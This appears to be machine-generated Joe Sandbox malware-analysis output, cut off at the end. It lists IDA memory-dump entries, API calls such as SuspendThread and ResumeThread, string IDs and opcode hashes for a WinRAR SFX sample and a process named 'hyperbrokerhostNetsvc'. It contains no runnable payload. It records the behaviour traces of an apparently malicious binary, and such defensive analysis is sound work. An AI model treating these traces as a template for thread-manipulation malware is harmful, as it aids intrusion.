                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: Software\WinRAR SFX$}
                                                                      • API String ID: 176396367-2483599790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 007CC29A: _wcslen.LIBCMT ref: 007CC2A2
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D1FE5
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D1FF6
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D2006
                                                                        • Part of subcall function 007D1FDD: _wcslen.LIBCMT ref: 007D2014
                                                                        • Part of subcall function 007D1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,007CB371,?,?,00000000,?,?,?), ref: 007D202F
                                                                        • Part of subcall function 007DAC04: SetCurrentDirectoryW.KERNELBASE(?,007DAE72,C:\Users\user\Desktop,00000000,0080946A,00000006), ref: 007DAC08
                                                                      • _wcslen.LIBCMT ref: 007DAE8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$CompareCurrentDirectoryString
                                                                      • String ID: <}$C:\Users\user\Desktop
                                                                      • API String ID: 521417927-660420333
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Malloc
                                                                      • String ID: (}$Z}
                                                                      • API String ID: 2696272793-402608430
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,007D1101,?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FEA
                                                                      • GetLastError.KERNEL32(?,?,007D117F,?,?,?,?,?,007D1169), ref: 007D0FF6
                                                                        • Part of subcall function 007C6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C6C54
                                                                      Strings
                                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 007D0FFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                      • API String ID: 1091760877-2248577382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,007CDA55,?), ref: 007CE2A3
                                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,007CDA55,?), ref: 007CE2B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FindHandleModuleResource
                                                                      • String ID: RTL
                                                                      • API String ID: 3537982541-834975271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE467
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: p}$z}
                                                                      • API String ID: 1269201914-339952203
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 007DE467
                                                                        • Part of subcall function 007DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007DE8D0
                                                                        • Part of subcall function 007DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DE8E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                      • String ID: U}$p}
                                                                      • API String ID: 1269201914-2839050623
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.4%
                                                                      Dynamic/Decrypted Code Coverage:75%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 19872 7ff8490c0d95 19873 7ff8490c0daf GetFileAttributesW 19872->19873 19875 7ff8490c0e75 19873->19875 19880 7ff8490becbb 19881 7ff8490becc6 ResumeThread 19880->19881 19883 7ff8490bedc4 19881->19883 19884 7ff8490bee19 19885 7ff8490bee27 FindCloseChangeNotification 19884->19885 19887 7ff8490bef04 19885->19887 19876 7ff8490bd4cd 19877 7ff8490bd4db SuspendThread 19876->19877 19879 7ff8490bd5b4 19877->19879

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 23 7ff8490bd4cd-7ff8490bd4d9 24 7ff8490bd4e4-7ff8490bd5b2 SuspendThread 23->24 25 7ff8490bd4db-7ff8490bd4e3 23->25 29 7ff8490bd5b4 24->29 30 7ff8490bd5ba-7ff8490bd604 24->30 25->24 29->30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: SuspendThread
                                                                      • String ID:
                                                                      • API String ID: 3178671153-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 33 7ff8490c0d95-7ff8490c0e73 GetFileAttributesW 37 7ff8490c0e75 33->37 38 7ff8490c0e7b-7ff8490c0eb9 33->38 37->38
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2318379558.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8490b0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !\I
                                                                      • API String ID: 0-2717366169
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b039ee02e5f5f678c46547aa8cd7d7384f006e0455caf3b7a2022ba4c7bc3abf
                                                                      • Instruction ID: 9beca3089a6ebed38cf4bf4428203ca16a2709654a23088c86c0fc9fa9920d8a
                                                                      • Opcode Fuzzy Hash: b039ee02e5f5f678c46547aa8cd7d7384f006e0455caf3b7a2022ba4c7bc3abf
                                                                      • Instruction Fuzzy Hash: A1513D307199498FEBD9FF288498A7973D2FF99745B1045B9E00EC72A6DE28EC418740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25f72912e238c4565cf72ef9064dd699091cd2d990536a723548d33d6e75c836
                                                                      • Instruction ID: 1a2c8106ecc6e073857acdefcb4783ed6e9495600b16795a7fe3972ea7151497
                                                                      • Opcode Fuzzy Hash: 25f72912e238c4565cf72ef9064dd699091cd2d990536a723548d33d6e75c836
                                                                      • Instruction Fuzzy Hash: E8518F319196599FDB44FBA8E4956EDBBB0FF48354F04027AD009DB292DF38A8818794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee9f28b44eb0e7b1b8df69a881f48b382024c5bc3a2e56558894133cd8c9201f
                                                                      • Instruction ID: 4747ea70a2d8c634770b2bf3c278436faa1c07aef963b5e90e5c06181f301471
                                                                      • Opcode Fuzzy Hash: ee9f28b44eb0e7b1b8df69a881f48b382024c5bc3a2e56558894133cd8c9201f
                                                                      • Instruction Fuzzy Hash: 80514730E0D559CFEB68EF54D8547EDB7A5FB48340F2582BAC41DD2281CB786886CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4f4642c4909abe85c9fe2013faa5a3457063ef9c24bfb36333756eaf8bcb3f8
                                                                      • Instruction ID: f23a02779732eaad449b7c0403ca8946dd75ecc508da8231f1431feb56f910f5
                                                                      • Opcode Fuzzy Hash: b4f4642c4909abe85c9fe2013faa5a3457063ef9c24bfb36333756eaf8bcb3f8
                                                                      • Instruction Fuzzy Hash: 7A41BD3084D3C99FDB5AEF6488659E47FF0EF16340F1941EBD448CB0A2DA389985C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 134e84679ec75933ccb8f45c3ae83e07138f1bf64390284d8aced5d8daf8c14f
                                                                      • Instruction ID: 3d41c8a70f8f7d635bd242444b49de6b09bc69e9e188927b68b73d442b2e4f48
                                                                      • Opcode Fuzzy Hash: 134e84679ec75933ccb8f45c3ae83e07138f1bf64390284d8aced5d8daf8c14f
                                                                      • Instruction Fuzzy Hash: 56411B3091895D8FDB84EF98D499AEDBBF1FF98341F00017AE409E3295DB34A8818B84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d61d02943b5ab8622590ffc9df63ae4b5b6a361c87ad9392ce9c7778515dcd5d
                                                                      • Instruction ID: 878e8685c34843d803521e4d952d06374dc39703e2786032e22b615889a77a68
                                                                      • Opcode Fuzzy Hash: d61d02943b5ab8622590ffc9df63ae4b5b6a361c87ad9392ce9c7778515dcd5d
                                                                      • Instruction Fuzzy Hash: 8D31E435D0D5AA8EE702BB68D8552FD7760EFC2355F0445B6C408DA1C3DB3C28498B59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction ID: fa1d069eeb16ae8e99daa8a96e39d7c51c8d3aa03569c750963826219b52b20b
                                                                      • Opcode Fuzzy Hash: 95f0bf59775c60f95461195e071d06b78c0d4710932068f253e9ba3d14cb32c7
                                                                      • Instruction Fuzzy Hash: F341F73091816A8FEB64EB14C898AECB2F5FB58341F5042F6D40DA22D6DB786EC5CF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b003804e91ba0d168f35c75e8bbe865d0957acb7f0e0435b8ded941d1652cbe
                                                                      • Instruction ID: 716f0b1f1f0520e178c210775be1c586f8d02a5a2b9c1ad614ba06999e0365d7
                                                                      • Opcode Fuzzy Hash: 6b003804e91ba0d168f35c75e8bbe865d0957acb7f0e0435b8ded941d1652cbe
                                                                      • Instruction Fuzzy Hash: 57319970A0952D8FDBA4EF14C895BE9B3F1FB68341F1041EA904EE3691DE756E858F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction ID: db08faa46ada67e9db2345921337a0bf98e4d9c9e6dcea249f4c592bfa3ce71f
                                                                      • Opcode Fuzzy Hash: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction Fuzzy Hash: CC11E331E0D6AA8EE702BB24D8142EA7B70EFC2351F0445B3D844DB1D2DB386909CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0621d600b6548c608a0df466a78d24aa4d4e9206d7df90e2e1bf5ad204ab598e
                                                                      • Instruction ID: 1148accf1cc3a7408c38e52874bf0c0425436927b8a9bec2d0ae3420a8a73c59
                                                                      • Opcode Fuzzy Hash: 0621d600b6548c608a0df466a78d24aa4d4e9206d7df90e2e1bf5ad204ab598e
                                                                      • Instruction Fuzzy Hash: B5111C7090878C8FCB49EF28C8959A97FF0EF29305F15019AE849D71A2DA75A594CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
                                                                      • Instruction ID: 033e422e8362a987e2e189256e2cca77f7c792c30e9afc259e27a6f2fcecce2e
                                                                      • Opcode Fuzzy Hash: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
                                                                      • Instruction Fuzzy Hash: 7A11E171D0D6AA8EE702BB24C8142EA7B70EF82350F0441B6D844DB2D2DF3C6904CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e064f93f5dd180649f1aa3895e600e71a83c746547026d51cee974a7cffca32
                                                                      • Instruction ID: f9b35f6f84c2cd2a8d230db422e1948e3d8e3425d047ec121784c0d4425d6dc8
                                                                      • Opcode Fuzzy Hash: 5e064f93f5dd180649f1aa3895e600e71a83c746547026d51cee974a7cffca32
                                                                      • Instruction Fuzzy Hash: 2F112A70808A8D8FDF85EF68C899AE97FF0FF29301F0505AAD418D7251DB34A554CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffbab9ebe1c51c28a84ec9cdfa6735c5ae75f3703356c41604339332037c7e76
                                                                      • Instruction ID: 4a637631b244d2c0612b58932864e4683c9195bb2db9bd493d85b6bc65c990a4
                                                                      • Opcode Fuzzy Hash: ffbab9ebe1c51c28a84ec9cdfa6735c5ae75f3703356c41604339332037c7e76
                                                                      • Instruction Fuzzy Hash: 92112A70918A8C9FCF45EF18C8999E97FB0FF69305F1542AAE808D7151D734E594CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3fd6de6b35ca1f921e15d19eb8b0342d1309870e84b9ca404d74f25582745b9
                                                                      • Instruction ID: 175fa1cae131fef1f7daa715f690ce6ce83028694f409307eac953e9ec949dae
                                                                      • Opcode Fuzzy Hash: c3fd6de6b35ca1f921e15d19eb8b0342d1309870e84b9ca404d74f25582745b9
                                                                      • Instruction Fuzzy Hash: DB113C7080868DCFCB45DF28C8589AA7BF0FF68301F0545AAE458C7192DB34D954CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1f83e27f3f186238a9ce063b902500758476208308455178dd6dbb900f364823
                                                                      • Instruction ID: 1cd2fd8b16c3b4526a1fcf7662cb5c3863e97f39ca8b7d71a90e12bb829968ce
                                                                      • Opcode Fuzzy Hash: 1f83e27f3f186238a9ce063b902500758476208308455178dd6dbb900f364823
                                                                      • Instruction Fuzzy Hash: F401A23144E7C94FD716AF306C652E57F64EF02340F1A42ABD098C74D3DA6D5555C382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cb77053c8ee64f083d805e299dc9b9160d38c12b9adedb900e3cf04b6e8a9a8
                                                                      • Instruction ID: 3c4c5dc31a69c662b50168a55c64811df15ce8f5331c71c1ba9220e5e1a91561
                                                                      • Opcode Fuzzy Hash: 8cb77053c8ee64f083d805e299dc9b9160d38c12b9adedb900e3cf04b6e8a9a8
                                                                      • Instruction Fuzzy Hash: 81112D70808A8D8FDF85EF68C858AAA7FF0FF25301F15059BD418D71A2DB359594CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05421ba1f7efdde5e34cb600ffd9255d57cf1556c567f1c694253e440abd42c9
                                                                      • Instruction ID: c50160318f87632c1b0b9b075df073fa5c1bf44c2685fd1c9c8c499cf0c45905
                                                                      • Opcode Fuzzy Hash: 05421ba1f7efdde5e34cb600ffd9255d57cf1556c567f1c694253e440abd42c9
